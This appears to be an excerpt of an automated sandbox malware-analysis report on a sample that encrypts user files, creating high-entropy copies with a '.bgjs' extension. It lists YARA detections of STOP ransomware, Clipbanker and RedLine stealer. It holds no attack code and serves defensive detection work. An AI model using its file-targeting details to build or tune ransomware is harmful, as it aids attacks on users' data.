            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99741919973Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99440143287Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm entropy: 7.99370786806Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99005922846Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99704831469Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99616349188Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99286495545Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99261978623Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99291951623Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml entropy: 7.9923521561Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml entropy: 7.9948541287Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml entropy: 7.99334163258Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml entropy: 7.99263901549Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99297141713Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db entropy: 7.99823735428Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db entropy: 7.9978803277Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.99819874132Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99239917934Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99689576035Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.99833803616Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99853707187Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99786306612Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99582378403Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.9948076794Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\AppData\Local\IconCache.db entropy: 7.99189770935Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99556487644Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99579717537Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99726182074Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99570837231Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.9951822615Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99531191944Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99715832942Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\Local Settings\IconCache.db.bgjs (copy) entropy: 7.99189770935Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.bgjs (copy) entropy: 7.99741919973Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy) entropy: 7.99440143287Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.bgjs (copy) entropy: 7.99122089769Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.bgjs (copy) entropy: 7.99370786806Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\jones\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy) entropy: 7.99005922846Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.bgjs (copy) entropy: 7.99704831469Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.bgjs (copy) entropy: 7.99616349188Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.bgjs (copy) entropy: 7.99286495545Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.bgjs (copy) entropy: 7.99261978623Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.bgjs (copy) entropy: 7.99291951623Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.bgjs (copy) entropy: 7.99297141713Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.bgjs (copy) entropy: 7.99823735428Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.bgjs (copy) entropy: 7.9978803277Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.bgjs (copy) entropy: 7.99819874132Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.bgjs (copy) entropy: 7.99239917934Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.bgjs (copy) entropy: 7.99689576035Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.bgjs (copy) entropy: 7.99833803616Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy) entropy: 7.99853707187Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.bgjs (copy) entropy: 7.99786306612Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.bgjs (copy) entropy: 7.99582378403Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.bgjs (copy) entropy: 7.9948076794Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.bgjs (copy) entropy: 7.99726182074Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.bgjs (copy) entropy: 7.99570837231Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.bgjs (copy) entropy: 7.9951822615Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.bgjs (copy) entropy: 7.99531191944Jump to dropped file
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.bgjs (copy) entropy: 7.99715832942Jump to dropped file
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199673019888[1].htm entropy: 7.99518365849Jump to dropped file

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 40.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 40.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 22.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 22.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 41.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 41.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 26.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 26.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 40.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 40.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 39.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 39.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 27.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 27.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 41.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 41.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 30.2.mstsca.exe.8915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 39.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 39.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 27.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 27.2.build3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 22.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 22.2.build3.exe.9815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 5.2.qJKiVKZdFk.exe.5de15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 38.2.qJKiVKZdFk.exe.5e615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 23.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 23.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 32.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 32.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 25.2.qJKiVKZdFk.exe.5e015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 21.2.qJKiVKZdFk.exe.5e815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 7.2.qJKiVKZdFk.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 23.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 23.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 31.2.qJKiVKZdFk.exe.5e715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 26.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 26.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 32.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 32.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 8.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 8.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 2.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 2.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 8.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 8.2.qJKiVKZdFk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 2.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 2.2.qJKiVKZdFk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0.2.qJKiVKZdFk.exe.5dc15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000016.00000002.1457933535.00000000009AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000019.00000002.1459503770.0000000005E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000027.00000002.1939278808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000028.00000002.2121357448.0000000000971000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000017.00000002.1390298736.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001A.00000002.1464580349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000019.00000002.1457594095.000000000444C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000007.00000002.1251680142.0000000004488000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000007.00000002.1251772468.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000008.00000002.3676316923.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 0000001F.00000002.1490235775.000000000422E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
            Source: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
            Source: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
